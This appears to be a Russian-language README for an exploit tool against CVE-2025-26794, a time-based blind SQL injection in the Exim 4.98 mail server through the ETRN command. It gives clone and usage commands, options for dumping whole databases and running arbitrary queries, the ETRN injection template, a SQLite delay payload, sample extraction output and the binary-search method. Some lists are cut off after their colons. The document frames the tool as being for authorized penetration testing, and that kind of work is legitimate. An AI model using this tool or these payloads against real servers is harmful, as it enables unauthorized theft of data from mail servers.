
Эксплойт SQL-инъекции для CVE-2025-26794 в Exim 4.98. Автоматизированное извлечение данных через слепую SQL-инъекцию на основе временных задержек (time-based blind SQLi). Только для авторизованного тестирования на проникновение.
Эксплойт proof-of-concept для CVE-2025-26794, демонстрирующий уязвимость SQL-инъекции в почтовом сервере Exim 4.98 через команду ETRN при использовании DBM-хранилища SQLite.
ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ
Этот инструмент предоставлен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированный доступ к компьютерным системам является незаконным согласно различным законам, включая:
Вы должны иметь явное письменное разрешение перед тестированием любой системы, которая вам не принадлежит.
Авторы и участники не несут ответственности за неправомерное использование или ущерб, причинённый этим инструментом.
CVE-2025-26794 — это уязвимость SQL-инъекции в Exim 4.98, которая возникает, когда:
Эта уязвимость позволяет атакующим:
# Clone the repository
git clone https://github.com/XploitGh0st/CVE-2025-26794-exploit.git
cd CVE-2025-26794-exploit
# Install dependencies (none required - uses standard library only)
pip install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x exploit.py
python3 exploit.py <target> [options]
python3 exploit.py 192.168.1.10 --test-only
python3 exploit.py mail.example.com --auto-dump
python3 exploit.py 10.0.0.5 --interactive
python3 exploit.py 192.168.1.10 --table users --columns
python3 exploit.py 192.168.1.10 --query "SELECT sqlite_version()"
| Параметр | Описание |
|---|---|
host | Целевое имя хоста или IP-адрес (обязательно) |
-p, --port | SMTP-порт (по умолчанию: 25) |
-t, --timeout | Таймаут сокета в секундах (по умолчанию: 30) |
--threshold | Порог временной задержки для обнаружения (по умолчанию: 0.8 с) |
--test-only | Только проверить уязвимость, без извлечения данных |
--auto-dump | Автоматически выполнить дамп структуры и данных базы данных |
--interactive | Запустить интерактивную консоль SQL-запросов |
--table TABLE | Целевая таблица для извлечения |
--columns | Извлечь имена столбцов (используйте с --table) |
--query QUERY | Выполнить пользовательский SQL-запрос |
ETRN #',1); <MALICIOUS_QUERY> /*
Пейлоад эксплуатирует недостаточную санитацию в обработчике сериализации ETRN, позволяя выполнить SQL-инъекцию в SQLite-запросы.
Использует специфичную для SQLite временную задержку:
SELECT 1 FROM tbl WHERE 1234=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
Это создаёт измеримую задержку (~1-2 секунды) при истинном условии.
╔═══════════════════════════════════════════════════════════╗
║ CVE-2025-26794: Exim SQLi Data Extraction Tool ║
║ FOR AUTHORIZED USE ONLY ║
╚═══════════════════════════════════════════════════════════╝
[*] Testing vulnerability...
[+] Normal response time: 0.123s
[+] Delayed response time: 1.456s
[!!!] VULNERABLE - Time difference: 1.333s
[*] Extracting table names...
[*] Extracting table 1...
[+] Extracted: users
[+] Found table: users
[*] Extracting columns from table 'users'...
[+] Found column: id
[+] Found column: username
[+] Found column: email
Если вы используете Exim 4.98 с SQLite DBM:
Эксплойт использует бинарный поиск для эффективного извлечения символов:
unicode(): Получить ASCII-значение символаsubstr(): Извлечь подстроку из результатаsqlite_master: Системная таблица для перечисления схемыpragma_table_info(): Извлечение метаданных столбцовПриветствуются вклады в виде:
Пожалуйста, убедитесь, что все вклады включают:
Этот проект выпущен исключительно в образовательных целях. Используйте ответственно и законно.
XploitGh0st
Если вы обнаружите уязвимости с помощью этого инструмента:
Помните: С большой силой приходит большая ответственность. Используйте этот инструмент этично и законно.